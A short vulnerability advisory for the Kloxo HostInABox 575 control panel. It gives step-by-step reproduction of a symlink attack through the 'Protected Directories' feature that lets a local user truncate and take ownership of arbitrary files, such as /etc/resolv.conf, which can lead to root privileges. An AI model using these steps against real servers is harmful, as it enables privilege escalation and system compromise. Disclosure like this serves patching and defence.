Kloxo HostInABox 575 - local users can truncate and control any file



DESCRIPTION


Local users can truncate and take over ownership of any file on the box via a symlink attack when specifying a "Virtual Directory" in the "Protected Directories" feature.



IMPACT


Local users could obtain root privileges.


1. As a local, unprivileged user, rename or remove the following directory: /home/httpd/example.com/__dirprotect
where "example.com" is the name of the domain for which we will be creating a protected directory.

2. cd /home/httpd/example.com/__dirprotect/
3. ln -s /etc/resolv.conf test_
4. Log into Kloxo
5. Click the "Protected Directories" link
6. In the "Auth Name" box, type anything
7. In the "Virtual Directory" box, type: test
8. Click "Add"


This is the result, note the ownership and the file size:

-rwxr-xr-x 1 user1 root 0 May 25 07:48 /etc/resolv.conf